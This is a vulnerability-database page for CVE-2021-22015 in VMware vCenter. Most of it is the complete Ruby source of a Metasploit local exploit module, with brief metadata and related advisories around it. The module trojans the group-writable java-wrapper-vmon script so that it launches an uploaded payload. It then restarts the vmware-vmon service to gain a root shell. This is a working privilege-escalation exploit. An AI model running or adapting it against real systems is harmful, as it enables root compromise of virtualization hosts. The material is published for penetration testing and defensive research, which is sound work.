VMware vCenter vScalation Privilege Escalation

🗓️ 06 Dec 2022 00:00:00Reported by h00die, Yuval Lazar, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 369 Views

VMware vCenter vScalation Privilege Escalation due to improper permissions on /usr/lib/vmware-vmon/java-wrapper-vmon file. Exploits vulnerability in vSphere/vCenter allowing anyone in 'cis' group to write to the file, executing as root on vmware-vmon service restart or host reboot

Reporter	Title	Published	Views	Family All 25
0day.today	VMware vCenter vScalation Privilege Escalation Exploit	7 Dec 202200:00	–	zdt
GithubExploit	Exploit for Files or Directories Accessible to External Parties in Vmware Cloud_Foundation	30 Sep 202107:16	–	githubexploit
BDU FSTEC	The vulnerability of the management tools for virtual infrastructure, such as VMware vCenter Server and VMware Cloud Foundation, relates to insecure management of privileges, allowing attackers to escalate their privileges.	8 Oct 202100:00	–	bdu_fstec
Circl	CVE-2021-22015	23 Sep 202116:29	–	circl
CNNVD	VMware vCenter Server 安全漏洞	21 Sep 202100:00	–	cnnvd
CNVD	VMware vCenter Server Local Authority Lifting Vulnerability	24 Sep 202100:00	–	cnvd
CVE	CVE-2021-22015	23 Sep 202100:00	–	cve
Cvelist	CVE-2021-22015	23 Sep 202100:00	–	cvelist
EUVD	EUVD-2021-9184	3 Oct 202520:07	–	euvd
Metasploit	VMware vCenter vScalation Priv Esc	5 Dec 202219:51	–	metasploit

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ManualRanking  
  
include Msf::Post::Linux::Priv  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'VMware vCenter vScalation Priv Esc',  
'Description' => %q{  
This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the  
/usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the  
cis group to write to the file, which will execute as root on vmware-vmon service  
restart or host reboot.  
  
This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.  
The following versions should be vulnerable:  
vCenter 7.0 before U2c  
vCenter 6.7 before U3o  
vCenter 6.5 before U3q  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # msf module  
'Yuval Lazar' # original PoC, analysis  
],  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [[ 'Auto', {} ]],  
'Privileged' => true,  
'References' => [  
[ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],  
[ 'CVE', '2021-22015' ],  
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]  
],  
'DisclosureDate' => '2021-09-21',  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'WfsDelay' => 1800 # 30min  
},  
'Notes' => {  
'Stability' => [CRASH_SERVICE_DOWN],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],  
'AKA' => ['vScalation']  
}  
)  
)  
register_advanced_options [  
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])  
]  
end  
  
# Simplify pulling the writable directory variable  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def java_wrapper_vmon  
'/usr/lib/vmware-vmon/java-wrapper-vmon'  
end  
  
def check  
group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")  
if writable?(java_wrapper_vmon) && group_owner == 'cis'  
return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")  
end  
  
CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")  
end  
  
def exploit  
# Check if we're already root  
if is_root? && !datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'  
end  
  
# Make sure we can write our exploit and payload to the local system  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
# backup the original file  
@backup = read_file(java_wrapper_vmon)  
path = store_loot(  
'java-wrapper-vmon.text',  
'text/plain',  
rhost,  
@backup,  
'java-wrapper-vmon.text'  
)  
print_good("Original #{java_wrapper_vmon} backed up to #{path}")  
  
# Upload payload executable  
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"  
print_status("Writing payload to #{payload_path}")  
upload_and_chmodx payload_path, generate_payload_exe  
register_files_for_cleanup payload_path  
  
# write trojaned file  
# we want to write our payload towards the top to ensure it gets run  
# writing it at the bottom of the file results in the payload not being run  
print_status("Writing trojaned #{java_wrapper_vmon}")  
write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))  
  
# try to restart the service  
print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')  
service_restart = cmd_exec('systemctl restart vmware-vmon.service')  
# one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files  
if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')  
print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')  
end  
print_status("Waiting #{datastore['WfsDelay']} seconds for shell")  
end  
  
def cleanup  
unless @backup.nil?  
print_status("Replacing trojaned #{java_wrapper_vmon} with original")  
write_file(java_wrapper_vmon, @backup)  
end  
super  
end  
end  
`

06 Dec 2022 00:00Current

1.3Low risk

Vulners AI Score1.3

CVSS 27.2

CVSS 3.17.8

EPSS0.01789